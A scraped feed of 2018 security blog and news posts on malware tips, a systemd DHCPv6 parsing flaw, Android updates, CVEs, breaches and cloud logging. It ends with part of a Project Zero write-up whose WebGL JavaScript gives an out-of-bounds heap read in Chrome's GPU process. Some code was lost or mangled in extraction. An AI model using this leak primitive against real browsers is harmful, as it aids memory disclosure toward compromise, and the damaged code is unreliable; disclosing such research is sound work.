Update devices.  Making sure your operating system is current is at the top of the list when it comes to guarding against malware attacks. Why? Because nearly every software update contains security improvements that help secure your computer from new threats. Better yet, go into your computer settings and schedule automatic updates. If you are a window user, immediately apply any Windows security patches that Microsoft sends you. 

Add a layer of security. It’s easy to ignore the idea of a malware attack — until one happens to you. Avoid this crisis by adding an extra layer of protection with a consumer product specifically designed to protect your home computer against malware and viruses. Once you’ve installed the software, be sure to keep it updated since new variants of malware arise all the time.

If infected: Worst case scenario, if you find yourself with a ransomware notice, immediately disconnect everything from the Internet. Hackers need an active connection to mobilize the ransomware and monitor your system. Once you disconnect from the Internet, follow these next critical steps. Most security experts advise against paying any ransoms since paying the ransom is no guarantee you’ll get your files back and may encourage a second attack.

The post Ghouls of the Internet: Protecting Your Family from Scareware and Ransomware appeared first on McAfee Blogs.

Systemd is bad parsing and should feel bad

Systemd has a remotely exploitable bug in its DHCPv6 client. That means anybody on the local network can send you a packet and take control of your computer. The flaw is a typical buffer-overflow. Several news stories have pointed out that this client was rewritten from scratch, as if that were the moral failing, instead of reusing existing code. That's not the problem.

The problem is that it was rewritten from scratch without taking advantage of the lessons of the past. It makes the same mistakes all over again.

In the late 1990s and early 2000s, we learned that parsing input is a problem. The traditional ad hoc approach you were taught in school is wrong. It's wrong from an abstract theoretical point of view. It's wrong from the practical point of view, error prone and leading to spaghetti code.

The first thing you need to unlearn is byte-swapping. I know that this was some sort epiphany you had when you learned network programming but byte-swapping is wrong. If you find yourself using a macro to swap bytes, like the be16toh() macro used in this code, then you are doing it wrong.

But, you say, the network byte-order is big-endian, while today's Intel and ARM processors are little-endian. So you have to swap bytes, don't you?

No. As proof of the matter I point to every other language other than C/C++. They don't don't swap bytes. Their internal integer format is undefined. Indeed, something like JavaScript may be storing numbers as a floating points. You can't muck around with the internal format of their integers even if you wanted to.

An example of byte swapping in the code is something like this:

In this code, it's taking a buffer of raw bytes from the DHCPv6 packet and "casting" it as a C internal structure. The packet contains a two-byte big-endian length field, "option->len", which the code must byte-swap in order to use.

Among the errors here is casting an internal structure over external data. From an abstract theory point of view, this is wrong. Internal structures are undefined. Just because you can sort of know the definition in C/C++ doesn't change the fact that they are still undefined.

From a practical point of view, this leads to confusion, as the programmer is never quite clear as to the boundary between external and internal data. You are supposed to rigorously verify external data, because the hacker controls it. You don't keep double-checking and second-guessing internal data, because that would be stupid. When you blur the lines between internal and external data, then your checks get muddled up.

Yes you can, in C/C++, cast an internal structure over external data. But just because you can doesn't mean you should. What you should do instead is parse data the same way as if you were writing code in JavaScript. For example, to grab the DHCP6 option length field, you should write something like:

The thing about this code is that you don't know whether it's JavaScript or C, because it's both, and it does the same thing for both.

Byte "swapping" isn't happening. We aren't extracting an integer from a packet, then changing it's internal format. Instead, we are extracting two bytes and combining them. This description may seem like needless pedantry, but it's really really important that you grok this. For example, there is no conditional macro here that does one operation for a little-endian CPU, and another operation for a big-endian CPU -- it does the same thing for both CPUs. Whatever words you want to use to describe the difference, it's still profound and important.

The other thing that you shouldn't do, even though C/C++ allows it, is pointer arithmetic. Again, it's one of those epiphany things C programmers remember from their early days. It's something they just couldn't grasp until one day they did, and then they fell in love with it. Except it's bad. The reason you struggled to grok it is because it's stupid and you shouldn't be using it. No other language has it, because it's bad.

I mean, back in the day, it was a useful performance optimization. Iterating through an array can be faster adding to pointer than incrementing an index. But that's virtually never the case today, and it just leads to needless spaghetti code. It leads to convoluted constructions like the following at the heart of this bug where you have to both do arithmetic on the pointer as well as on the length which you are checking against. This nonsense leads to confusion and ultimately, buffer overflows.

In a heckofalot of buffer overflows over the years, there's a construct just like this lurking near the bug. If you are going to do a rewrite of code, then this is a construct you need to avoid. Just say no to pointer arithmetic.

In my code, you see a lot of constructs where it's buf, offset, and length. The buf variable points to the start of the buffer and is never incremented. The length variable is the max length of the buffer and likewise never changes. It's the offset variable that is incremented throughout.

Because of simplicity, buffer overflow checks become obvious, as it's always "offset + x < length", and easy to verify. In contrast, here is the fix for the DHCPv6 buffer overflow. That this is checking for an external buffer overflow is less obvious:

Now let's look at that error code. That's not what ENOBUFS really means. That's an operating system error code that has specific meaning about kernel buffers. Overloading it for userland code is inappropriate.

That argument is a bit pedantic I grant you, but that's only the start. The bigger issue is that it's identifying the symptom not the problem. The ultimate problem is that the code failed to sanitize the original input, allowing the hacker to drive computation this deep in the system. The error isn't that the buffer is too small to hold the output, the original error is that the input was too big. Imagine if this gets logged and the sysadmin reviewing dmesg asks themselves how they can allocate bigger buffers to the DHCP6 daemon. That is entirely the wrong idea.

Again, we go back to lessons of 20 years that this code ignored, the necessity of sanitizing input.

Now let's look at assert(). This is a feature in C that we use to double-check things in order to catch programming mistakes early. An example is the code below, which is checking for programming mistakes where the caller of the function may have used NULL-pointers:

This is pretty normal, but now consider this other use of assert().

This isn't checking errors by the programmer here, but is instead validating input. That's not what you are supposed to use asserts for. This are very different things. It's a coding horror that makes you shriek and run away when you see it. In my fact, that's my Halloween costume this year, using asserts to validate network input.

This reflects a naive misunderstanding by programmers who don't understand the difference between out-of-band checks validating the code, and what the code is supposed to be doing validating input. Like the buffer overflow check above, EINVAL because a programmer made a mistake is a vastly different error than EINVAL because a hacker tried to inject bad input. These aren't the same things, they aren't even in the same realm.


Rewriting old code is a good thing -- as long as you are fixing the problems of the past and not repeating them. We have 20 years of experience with what goes wrong in network code. We have academic disciplines like langsec that study the problem. We have lots of good examples of network parsing done well. There is really no excuse for code that is of this low quality.

This code has no redeeming features. It must be thrown away and rewritten yet again. This time by an experienced programmer who know what error codes mean, how to use asserts properly, and most of all, who has experience at network programming.

Google sets Android security updates rules but enforcement is unclear

The vendor requirements for Android are a strange and mysterious thing but a new leak claims Google has added language to force manufacturers to push more regular Android security updates.

According to The Verge, Google’s latest contract will require OEMs to supply Android security updates for two years and provide at least four updates within the first year of a device’s release. Vendors will also have to release patches within 90 days of Google identifying a vulnerability.

Mandating more consistent Android security updates is certainly a good thing, but it remains unclear what penalties Google would levy against manufacturers that fail to provide the updates or if Google would follow through on any punitive actions.

It has been known for years that Google sets certain rules for manufacturers who want to include the Play Store, Play services and Google apps on Android devices, but because enforcement has been unclear the rules have sometimes been seen as mere suggestions.

For example, Google has had a requirement in place since the spring of 2011 mandating manufacturers to upgrade devices to the latest version of the Android OS released within 18 months of a device’s launch. However, because of the logistics issues of providing those OS updates, Google has rarely been known to enforce that requirement.

This can be seen in the Android OS distribution numbers, which are a complete mess. Currently, according to Google, the most popular version of Android on devices in the wild is Android 6.0 Marshmallow (21.6%), followed by Android 7.0 (19%), Android 5.1 (14.7%), Android 8.0 (13.4%) and Android 7.1 (10.3%). And not even showing up on Google’s numbers because it hasn’t hit the 0.1% threshold for inclusion is Android 9.0 released in August.

Theoretically, the ultimate enforcement of the Android requirements would be Google barring a manufacturer from releasing a device that includes Google apps and services, but there have been no reports of that ever happening. Plus, the European Union’s recent crackdown on Android give an indication that Google does wield control over the Android ecosystem — and was found to be abusing that power.

The ruling in the EU will allow major OEMs to release forked versions of Android without Google apps and services (something they were previously barred from doing by Google’s contract). It will also force Google to bundle the Play Store, services and most Google apps into a paid licensing bundle, while offering — but not requiring — the Chrome browser and Search as a free bundle. Although early rumors suggest Google might offset the cost of the apps bundle by paying OEMs to use Chrome and Google Search, effectively making it all free and sidestepping any actual change.

These changes only apply to Android devices released in the EU, but it should lead to more devices on the market running Android but featuring third-party apps and services. This could mean some real competition for Google from less popular Android forks such as Amazon’s Fire OS or Xiaomi’s MIUI.

It’s still unknown if the new rules regarding Android security updates are for the U.S. only or if they will be part of contracts in other regions. But, an unintended consequence of the EU rules might be to strengthen Google’s claim that the most secure Android devices are those with the Play Store and Play services.

Google has long leaned on its strong record of keeping malware out of the Play Store and off of user devices, if Play services are installed. Google consistently shows that the highest rates of malware come from sideloading apps in regions where the Play Store and Play services are less common — Russia and China – and where third-party sources are more popular.

Assuming the requirements for Android security updates do apply in other regions around the globe, it might be fair to also assume they’d be tied to the Google apps and services bundle (at least in the EU) because otherwise Google would have no way to put teeth behind the rules. So, not only would Google have its stats regarding how much malware is taken care of in the Play Store and on user devices by Play services, it might also have more stats showing those devices are more consistently updated and patched.

The Play Store, services and Google apps are an enticing carrot to dangle in front of vendors when requiring things like Android security updates, and there is reason to believe manufacturers would be willing to comply in order to get those apps and services, even if the penalties are unclear.

More competition will be coming to the Android ecosystem in the EU, and it’s not unreasonable to think that competition could spread to the U.S., especially if Google is scared to face similar actions by the U.S. government (as unlikely as that may seem).  And the less power Google apps and services have in the market, the  less force there will be behind any Google requirements for security updates.


The post Google sets Android security updates rules but enforcement is unclear appeared first on Security Bytes.

DisruptOps: Consolidating Config Guardrails with Aggregators

Posted under:

Disrupt:Ops: Consolidating Config Guardrails with Aggregators

In Quick and Dirty: Building an S3 guardrail with Config we highlighted that one of the big problems with Config is you need to build it in all regions of all accounts separately. Now your best bet to make that manageable is to use infrastructure as code tools like CloudFormation to replicate your settings across environments. We have a lot more to say on scaling out baseline security and operations settings, but for this post I want to highlight how to aggregate Config into a unified dashboard.

Read the full post at DisruptOps

- Rich (0) Comments Subscribe to our daily email digest

CVE-2018-5914 (mdm9206_firmware, mdm9607_firmware, mdm9650_firmware, sd_205_firmware, sd_210_firmware, sd_212_firmware, sd_425_firmware, sd_430_firmware, sd_450_firmware, sd_625_firmware, sd_650_firmware, sd_652_firmware, sd_835_firmware, sda660_firmware)

Improper input validation in TZ led to array out of bound in TZ function while accessing the peripheral details using the incoming data in Snapdragon Mobile, Snapdragon Wear version MDM9206, MDM9607, MDM9650, SD 210/SD 212/SD 205, SD 425, SD 430, SD 450, SD 625, SD 650/52, SD 835, SDA660.

CVE-2018-5866 (mdm9206_firmware, mdm9607_firmware, mdm9650_firmware, sd_205_firmware, sd_210_firmware, sd_212_firmware, sd_425_firmware, sd_430_firmware, sd_450_firmware, sd_625_firmware, sd_650_firmware, sd_652_firmware, sd_835_firmware, sd_845_firmware, sd_850_firmware, sda660_firmware)

While processing logs, data is copied into a buffer pointed to by an untrusted pointer in Snapdragon Mobile, Snapdragon Wear in version MDM9206, MDM9607, MDM9650, SD 210/SD 212/SD 205, SD 425, SD 430, SD 450, SD 625, SD 650/52, SD 835, SD 845, SD 850, SDA660.

Uber hackers also reportedly breached LinkedIn’s training site

The hackers who were responsible for the Uber data breach that affected 57 million users around the world have been indicted... for another hack altogether, according to TechCrunch. Canadian citizen Vasile Mereacre and Florida resident Brandon Glover have been indicted for stealing account information from LinkedIn training site, but a TechCrunch source said they were also behind the massive Uber breach back in 2016. If true, then they got caught for a much smaller scheme: the Lynda cyberattack only compromised 55,000 accounts.

Source: TechCrunch

Risky Biz Soap Box: Duo’s Olabode Anise recap’s his Black Hat talk on Twitter bots

Soap Box is the wholly sponsored podcast series we do where vendors pay to participate. They sometimes want to talk about their products, other times they want to talk about general ecosystem stuff, other times they want to talk about research they’ve done.

And that’s what’s happening today! Olabode Anise is a data scientist at Duo Security. He and his colleague Jordan Wright put together a talk for Black Hat this year all about Twitter bots. It was called Don’t @ me, hunting Twitter bots at scale.

As you’ll hear, finding bots on Twitter at scale isn’t that hard, but doing so with 100% confidence isn’t as easy as you’d think.

You can check out a blog post from Olabode in the show note below.

MPOWER Americas Cybersecurity Summit 2018 is a Wrap!

This year’s MPOWER Americas was packed with innovative keynote speakers, the MPOWER Partner Summit, tons of sessions, technical deep dives, demos, an Innovation Fair, and much more. Take a look at some of the highlights from this year’s event!

“Together is Power” in Action at Partner Summit

On Tuesday, we hosted Partner Summit, our first event associated with MPOWER 2018. During the event, head of channel sales and operations for the Americas, Ken McCray, took the stage and discussed the road map going forward and new opportunities for partners. He emphasized the important role partners play in McAfee’s strategy to provide threat defense and data protection from device to cloud.

During Partner Summit, we also announced the addition of 17 new partners and 16 newly certified integrations to the Security Innovation Alliance. The program now includes 152 partners worldwide and highlights the need for the cybersecurity industry to work together to handle the challenges of today’s changing cyberthreat landscape.

Before the day came to a close, we announced the winners of our distinguished Partner Awards, which recognizes partners who demonstrate the embodiment of three foundational pillars of the McAfee Partner Program: strategic relationships, profitable partnerships, and driving better customer outcomes.

Day One of MPOWER Americas 2018

MPOWER officially kicked off when McAfee CEO, Chris Young, welcomed attendees and urged everyone to think about the road map to the future we’re building together. He explored three key factors defining that map: the constantly evolving threatscape, the ever-shifting technology landscape, and regulators working to protect individuals and their data as threats and technology evolve.

MVISION EDR and MVISION Cloud Announced on MPOWER Mainstage

At MPOWER, Chris Young announced the latest additions to the MVISION product family: MVISION Endpoint Detection and Response (MVISION EDR), an offering that provides new endpoint security capabilities, and MVISION Cloud, which is based on technology gained via the acquisition of Skyhigh Networks in early 2018.

Vice president and general manager of corporate products, Raja Patel, and principal engineer Ismael Valenzuela took the mainstage to demonstrate how MVISION EDR, as a cloud-native solution, helps human responders detect, remediate, and investigate threats with more speed and agility. Raja Patel said that the goal of MVISION EDR is to reduce the time it takes to detect and respond to threats.

Senior vice president of the cloud security business unit, Rajiv Gupta, then introduced MVISION Cloud. He explained that it’s a cloud-native platform that integrates seamlessly with cloud service providers, giving businesses the comprehensive control they need to enable employees, developers, and partners to be productive, while satisfying customers and accelerating business.

Day One keynotes wrapped up with a compelling talk by acclaimed journalist and historian Walter Isaacson. He was then joined by McAfee CMO, Allison Cerra, for a fireside chat. They discussed innovation, collaboration, and networking.

Day Two of MPOWER Americas 2018

Chris Young started Day Two of MPOWER talking about how MVISION’s management-led, cloud-delivered tools answer the call of today’s constantly evolving threatscape. He emphasized that MVISION optimizes our customers’ resources so they can spend more time running their security programs and fighting adversaries

Following Chris Young’s closing remarks, Sir Tim Berners-Lee, the inventor of the World Wide Web, shared an inspiring keynote and was then joined by Rob Sloan from the Wall Street Journal for an insightful conversation about data, privacy, and how we can continue to secure the World Wide Web.

Saving the best for last, senior vice president and CTO, Steve Grobman, took the stage to reveal Project Apollo, a pipeline to ingest, redact, and analyze 116 million data points in just five minutes. He said Project Apollo will help McAfee customers increase situational awareness and visibility so they can derive actionable insights by combining what’s coming from their own environment with threat intelligence data collected by over 1 billion McAfee sensors from networks, endpoints, the perimeter, and the cloud worldwide.

Advanced Threat Research Team Reveals Operation Oceansalt

On the last day of MPOWER, our Advanced Threat Research team revealed their latest discovery: Operation Oceansalt, a new cyberespionage campaign targeting South Korea, the United States, and Canada. It uses a 2010 data reconnaissance implant from the hacker group APT1, or Comment Crew, a Chinese military-affiliated group.

Thank you everyone who attended MPOWER Americas 2018. We hope to see you next year!


The post MPOWER Americas Cybersecurity Summit 2018 is a Wrap! appeared first on McAfee Blogs.

Cloudera and Hortonworks Merge

Posted under: News

I had been planning to post on the recent announcement of the planned merger between Hortonworks and Cloudera, as there are a number of trends I’ve been witnessing with the adoption of Hadoop clusters, and this merger reflects them in a nutshell. But catching up on my reading I ran across Mathew Lodge’s recent article in VentureBeat titled Cloudera and Hortonworks merger means Hadoop’s influence is declining. It’s a really good post. I can confirm we see the same lack of interest in deployment of Hadoop to the cloud, the same use of S3 as a storage medium when Hadoop is used atop Infrasrtucture as a Service (IaaS), and the same developer-driven selection of whatever platform is easiest to use and deploy on. All in all it’s an article I wish I’d written, as he did a great job capturing most of the areas I wanted to cover. And there are some humorous bits like “Ironically, there has been no Cloud Era for Cloudera.” Check it out – it’s worth your time.

But there are a couple other areas I still want to cover.

It is rare to see someone install Hadoop into a public IaaS account. Customers (now) choose a cloud native variant and let the vendor handle all the patching and hide much of the infrastructure pieces from them. And they gain the option of spinning down the cluster when not in use, making it much more efficient. Couple that with all the work to set up Hadoop yourself, and it’s an easy decision. I was somewhat surprised to learn that things like AWS’s Elastic Map Reduce (EMR) are not always chosen as repository, but Dynamo is surprisingly popular – which makes sense, given its powerful query features, indexing, and ability to offer the best of relational and big data capabilities. Most public IaaS vendors offer so many database variants that it is easy to mix and match multiple variants to support applications, further reducing demand for classic Hadoop installations.

One area continuing to drive Hadoop adoption is on-premise data collection and data lakes for logs. The most cited driver is the need to keep Splunk costs under control. It takes effort to divert some content to Hadoop instead of sending everything to the Splunk collectors – but data can be collected and held at drastically lower cost. And you need not sacrifice analytics. For organizations collecting every log entry, this is a win. We also see Hadoop adopted by Security Operations Centers, running side by side with other platforms. Part of the need is to fill gaps around what their SIEM keeps, part is to keep costs down, and part is to easily support deployment of custom security intelligence applications by non-developers.

Another aspect not covered in any of the articles I have found so far is that Cloudera and Hortonworks both have deep catalogs of security capabilities. Together they are dominant. As firms use large “data lakes” to hold all sorts of sensitive data inside Hadoop, this will be a win for firms running Hadoop in-house. Identity management, encryption, monitoring, and a whole bunch of other great stuff. Big data is not the security issue it was 5 years ago. Hortonworks and Cloudera have a lot to do with that; their combined capabilities and enterprise deployment experience make them a powerful choice to help firms manage and maintain existing infrastructure. That is all my way of saving that some of their negative press is unwarranted, given the profitable avenues ahead.

The idea that growth in the Hadoop segment appears to have been slowing is not new. AWS has been the largest seller of Hadoop-based data platforms, by revenue and by customer, for several years. The cloud is genuinely an existential threat to all the commercial Hadoop vendors – and comparable big data databases – if they continue to sell in the same way. The recent acceleration of cloud adoption simply makes it more apparent that Cloudera and Hortonworks are competing for a shrinking share of IT budgets. But it makes sense to band together and make the most of their expertise in enterprise Hadoop deployments, and should help with tooling and management software for cloud migrations. If Kubernetes is any indication, there are huge areas for improvement in tooling and services beyond what cloud vendors provide.

- Adrian Lane (0) Comments Subscribe to our daily email digest

Have Network, Need Network Security Monitoring

I have been associated with network security monitoring my entire cybersecurity career, so I am obviously biased towards network-centric security strategies and technologies. I also work for a network security monitoring company (Corelight), but I am not writing this post in any corporate capacity.

There is a tendency in many aspects of the security operations community to shy away from network-centric approaches. The rise of encryption and cloud platforms, the argument goes, makes methodologies like NSM less relevant. The natural response seems to be migration towards the endpoint, because it is still possible to deploy agents on general purpose computing devices in order to instrument and interdict on the endpoint itself.

It occurred to me this morning that this tendency ignores the fact that the trend in computing is toward closed computing devices. Mobile platforms, especially those running Apple's iOS, are not friendly to introducing third party code for the purpose of "security." In fact, one could argue that iOS is one of, if not the, most security platform, thanks to this architectural decision. (Timely and regular updates, a policed applications store, and other choices are undoubtedly part of the security success of iOS, to be sure.)

How is the endpoint-centric security strategy going to work when security teams are no longer able to install third party endpoint agents? The answer is -- it will not. What will security teams be left with?

The answer is probably application logging, i.e., usage and activity reports from the software with which users interact. Most of this will likely be hosted in the cloud. Therefore, security teams responsible for protecting work-anywhere-but-remote-intensive users, accessing cloud-hosted assets, will have really only cloud-provided data to analyze and escalate.

It's possible that the endpoint providers themselves might assume a greater security role. In other words, Apple and other manufacturers provide security information directly to users. This could be like Chase asking if I really made a purchase. This model tends to break down when one is using a potentially compromised asset to ask the user if that asset is compromised.

In any case, this vision of the future ignores the fact that someone will still be providing network services. My contention is that if you are responsible for a network, you are responsible for monitoring it.

It is negligent to provide network services but ignore abuse of that service.

If you disagree and cite the "common carrier" exception, I would agree to a certain extent. However, one cannot easily fall back on that defense in an age where Facebook, Twitter, and other platforms are being told to police their infrastructure or face ever more government regulation.

At the end of the day, using modern Internet services means, by definition, using someone's network. Whoever is providing that network will need to instrument it, if only to avoid the liability associated with misuse. Therefore, anyone operating a network would do well to continue to deploy and operate network security monitoring capabilities.

We may be in a golden age of endpoint visibility, but closure of those platforms will end the endpoint's viability as a source of security logging. So long as there are networks, we will need network security monitoring.

Building a Multi-cloud Logging Strategy: Introduction

Posted under: Heavy Research

Logging and monitoring for cloud infrastructure has become the top topic we are asked about lately. Even general conversations about moving applications to the cloud always seem to end with clients asking how to ‘do’ logging and monitoring of cloud infrastructure. Logs are key to security and compliance, and moving into cloud services – where you do not actually control the infrastructure – makes logs even more important for operations, risk, and security teams. But these questions make perfect sense – logging in and across cloud infrastructure is complicated, offering technical challenges and huge potential cost overruns if implemented poorly.

The road to cloud is littered with the charred remains of many who have attempted to create multi-cloud logging for their respective employers. But cloud services are very different – structurally and operationally – than on-premise systems. The data is different; you do not necessarily have the same event sources, and the data is often different or incomplete, so existing reports and analytics may not work the same. Cloud services are ephemeral so you can’t count on a server “being there” when you go looking for it, and IP addresses are unreliable identifiers. Networks may appear to behave the same, but they are software defined, so you cannot tap into them the same way as on-premise, nor make sense of the packets even if you could. How you detect and respond to attacks differs, leveraging automation to be as agile as your infrastructure. Some logs capture every API call; while their granularity of information is great, the volume of information is substantial. And finally, the skills gap of people who understand cloud is absent at many companies, so they ‘lift and shift’ what they do today into their cloud service, and are then forced to refactor the deployment in the future.

One aspect that surprised all of us here at Securosis is the adoption of multi-cloud; we do not simply mean some Software as a Service (SaaS) along with a single Infrastructure as a Service (IaaS) provider – instead firms are choosing multiple IaaS vendors and deploying different applications to each. Sometimes this is a “best of breed” approach, but far more often the selection of multiple vendors is driven by fear of getting locked in with a single vendor. This makes logging and monitoring even more difficult, as collection across IaaS providers and on-premise all vary in capabilities, events, and integration points.

Further complicating the matter is the fact that existing Security Information and Event Management (SIEM) vendors, as well as some security analytics vendors, are behind the cloud adoption curve. Some because their cloud deployment models are no different than what they offer for on-premise, making integration with cloud services awkward. Some because their solutions rely on traditional network approaches which don’t work with software defined networks. Still others employ pricing models which, when hooked into highly verbose cloud log sources, cost customers small fortunes. We will demonstrate some of these pricing models later in this paper.

Here are some common questions:

  • What data or logs do I need? Server/network/container/app/API/storage/etc.?
  • How do I get them turned on? How do I move them off the sources?
  • How do I get data back to my SIEM? Can my existing SIEM handle these logs, in terms of both different schema and volume & rate?
  • Should I use log aggregators and send everything back to my analytics platform? At what point during my transition to cloud does this change?
  • How do I capture packets and where do I put them?

These questions, and many others, are telling because they come from trying to fit cloud events into existing/on-premise tools and processes. It’s not that they are wrong, but they highlight an effort to map new data into old and familiar systems. Instead you need to rethink your logging and monitoring approach.

The questions firms should be asking include:

  • What should my logging architecture look like now and how should it change?
  • How do I handle multiple accounts across multiple providers?
  • What cloud native sources should I leverage?
  • How do I keep my costs manageable? Storage can be incredibly cheap and plentiful in the cloud, but what is the pricing model for various services which ingest and analyze the data I’m sending them?
  • What should I send to my existing data analytics tools? My SIEM?
  • How do I adjust what I monitor for cloud security?
  • Batch or real-time streams? Or both?
  • How do I adjust analytics for cloud?

You need to take a fresh look at logging and monitoring, and adapt both IT and security workflows to fit cloud services – especially if you’re transitioning to cloud from an on-premise environment and will be running a hybrid environment during the transition… which may be several years from initial project kick-off.

Today we launch a new series on Building a Multi-cloud Logging Strategy. Over the next few weeks, Gal Shpantzer and I (Adrian Lane) will dig into the following topics to discuss what we see when helping firms migrate to cloud. And there is a lot to cover.

Our tentative outline is as follows:

  1. Barriers to Success: This post will discuss some reasons traditional approaches do not work, and areas where you might lack visibility.
  2. Cloud Logging Architectures: We discuss anti-patterns and more productive approaches to logging. We will offer recommendations on reference architectures to help with multi-cloud, as well as centralized management.
  3. Native Logging Features: We’ll discuss what sorts of logs you can expect to receive from the various types of cloud services, what you may not receive in a shared responsibility service, the different data sources firms have come to expect, and how to get them. We will also provide practical notes on logging in GCP, Azure, and AWS. We will help you navigate their native offerings, as well as the capabilities of PaaS/SaaS vendors.
  4. BYO Logging: Where and how to fill gaps with third-party tools, or building them into applications and service you deploy in the cloud.
  5. Cloud or On-premise Management? We will discuss tradeoffs between moving log management into the cloud, keeping these activities on-premise, and using a hybrid model. This includes risks and benefits of connecting cloud workloads to on-premise networks.
  6. Security Analytics: More and more firms are augmenting or replacing traditional SIEM with security analytics, data lakes, and ML/AI; so we will discuss some of these approaches along with various data sources for threat detection, compliance, and governance. This is the goal behind 1-5 above: facilitating the ability to collect, transform, and store – to gain real-time and historical insight.

As always, questions, comments, disagreements, and other constructive input are encouraged.

- Adrian Lane (0) Comments Subscribe to our daily email digest

Cathay Pacific data breach affects up to 9.4 million customers

Cathay Pacific, the primary airline of Hong Kong known for its high-speed WiFi, was hit with a major data breach that affects up to 9.4 million passengers. The company said that personal information including passport numbers, identity card numbers, credit card numbers, frequent flyer membership program numbers, customer service comments and travel history had been compromised. No passwords were compromised, which may not be any consolation.

Via: The Guardian

Source: Cathay Pacific

“Grand Theft Auto V” Hack: How to Defeat the Online Gaming Bug

Over the past two decades, we’ve seen a huge rise in the popularity of online gaming among both children and adults. One particular game that has experienced huge success is “Grand Theft Auto,” or GTA, which has been developed and produced by Rockstar Games. The most recent edition of the game, “Grand Theft Auto V,” hit $6 billion in sales as of April 2018, creating a record-breaking impact in the gaming industry. However, the game’s massive success doesn’t mean it’s immune to cyberattacks. A recent vulnerability in “Grand Theft Auto V” allowed malicious trolls to take over users’ games who were entering into single-player mode. By leveraging the flaw, these hackers were not only able to kick gamers off of their single-player session but could also continually kill their avatar.

So how exactly did these trolls carry out these attacks? Beginning last week, reports began to circulate that one popular ‘mod menu,’ or a series of alterations sought out and installed by players, was all the sudden advertising the ability to discover an online player’s Rockstar ID – a problem potentially originating from a bug found in the game’s most recent update. Taking advantage of this opportunity, hackers gained access to users’ Rockstar IDs and took control of their single-player games. Soon enough, legitimate players’ games were hijacked and sabotaged.

It is unclear as to whether this vulnerability came out of Rockstar’s most recent update or if this hack has been around for years and just now found its way to public PC mod menus. Either way, it sheds light on how persistent cyberthreats are in the world of online gaming – even impacting some of the most popular video games out there, such as “Grand Theft Auto V.”

Fortunately, reports are already circulating the bug was quietly patched over the weekend (despite confirmation from the game’s developer) – so to protect against the hack, all users should update their game as soon as possible. However, that doesn’t mean there still aren’t some steps these gamers can take to protect themselves from future hacks and vulnerabilities. Check out the following tips:

  • Limit the personal info on your online profile. Gamers are required to create a user profile in order to access the appropriate console/computer network. When creating your profile, avoid displaying your personal information that could potentially be used against you by hackers, such as your name, address, date of birth, and email address.
  • Create a unique and complex password for your online profile. The more complex the password, the more difficult it will be for a hacker to access your personal information. And, of course, make sure you don’t share your password with other users.
  • Be careful who you chat with. Online games will usually have a built-in messenger service that allows players to contact each other. It’s important to be aware of the risks associated with chatting to strangers. If you choose to use the chat feature in your online game, never give out your account details and avoid opening messages with attached files or links.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow me and @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post “Grand Theft Auto V” Hack: How to Defeat the Online Gaming Bug appeared first on McAfee Blogs.

Heap Feng Shader: Exploiting SwiftShader in Chrome

Posted by Mark Brand, Google Project Zero

On the majority of systems, under normal conditions, SwiftShader will never be used by Chrome - it’s used as a fallback if you have a known-bad “blacklisted” graphics card or driver. However, Chrome can also decide at runtime that your graphics driver is having issues, and switch to using SwiftShader to give a better user experience. If you’re interested to see the performance difference, or just to have a play, you can launch Chrome using SwiftShader instead of GPU acceleration using the --disable-gpu command line flag.

SwiftShader is quite an interesting attack surface in Chrome, since all of the rendering work is done in a separate process; the GPU process. Since this process is responsible for drawing to the screen, it needs to have more privileges than the highly-sandboxed renderer processes that are usually handling webpage content. On typical Linux desktop system configurations, technical limitations in sandboxing access to the X11 server mean that this sandbox is very weak; on other platforms such as Windows, the GPU process still has access to a significantly larger kernel attack surface. Can we write an exploit that gets code execution in the GPU process without first compromising a renderer? We’ll look at exploiting two issues that we reported that were recently fixed by Chrome.

It turns out that if you have a supported GPU, it’s still relatively straightforward for an attacker to force your browser to use SwiftShader for accelerated graphics - if the GPU process crashes more than 4 times, Chrome will fallback to this software rendering path instead of disabling acceleration. In my testing it’s quite simple to cause the GPU process to crash or hit an out-of-memory condition from WebGL - this is left as an exercise for the interested reader. For the rest of this blog-post we’ll be assuming that the GPU process is already in the fallback software rendering mode.

Previous precision problems

So; we previously discussed an information leak issue resulting from some precision issues in the SwiftShader code - so we’ll start here, with a useful leaking primitive from this issue. A little bit of playing around brought me to the following result, which will allocate a texture of size 0xb620000 in the GPU process, and when the function read()is called on it will return the 0x10000 bytes directly following that buffer back to javascript. (The allocation will happen at the first line marked in bold, and the out-of-bounds access happens at the second).

function issue_1584(gl) {
 const src_width  = 0x2000;
 const src_height = 0x16c4;

 // we use a texture for the source, since this will be allocated directly
 // when we call glTexImage2D.

 this.src_fb = gl.createFramebuffer();
 gl.bindFramebuffer(gl.READ_FRAMEBUFFER, this.src_fb);

 let src_data = new Uint8Array(src_width * src_height * 4);
 for (var i = 0; i < src_data.length; ++i) {
   src_data[i] = 0x41;

 let src_tex = gl.createTexture();
 gl.bindTexture(gl.TEXTURE_2D, src_tex);
 gl.texImage2D(gl.TEXTURE_2D, 0, gl.RGBA8, src_width, src_height, 0, gl.RGBA, gl.UNSIGNED_BYTE, src_data);
 gl.texParameteri(gl.TEXTURE_2D, gl.TEXTURE_MIN_FILTER, gl.NEAREST);
 gl.texParameteri(gl.TEXTURE_2D, gl.TEXTURE_MAG_FILTER, gl.NEAREST);
 gl.framebufferTexture2D(gl.READ_FRAMEBUFFER, gl.COLOR_ATTACHMENT0, gl.TEXTURE_2D, src_tex, 0); = function() {
   gl.bindFramebuffer(gl.READ_FRAMEBUFFER, this.src_fb);

   const dst_width  = 0x2000;
   const dst_height = 0x1fc4;

   dst_fb = gl.createFramebuffer();
   gl.bindFramebuffer(gl.DRAW_FRAMEBUFFER, dst_fb);

   let dst_rb = gl.createRenderbuffer();
   gl.bindRenderbuffer(gl.RENDERBUFFER, dst_rb);
   gl.renderbufferStorage(gl.RENDERBUFFER, gl.RGBA8, dst_width, dst_height);
   gl.framebufferRenderbuffer(gl.DRAW_FRAMEBUFFER, gl.COLOR_ATTACHMENT0, gl.RENDERBUFFER, dst_rb);

   gl.bindFramebuffer(gl.DRAW_FRAMEBUFFER, dst_fb);

   // trigger
   gl.blitFramebuffer(0, 0, src_width, src_height,
                      0, 0, dst_width, dst_height,
                      gl.COLOR_BUFFER_BIT, gl.NEAREST);

   // copy the out of bounds data back to javascript
   var leak_data = new Uint8Array(dst_width * 8);
   gl.bindFramebuffer(gl.READ_FRAMEBUFFER, dst_fb);
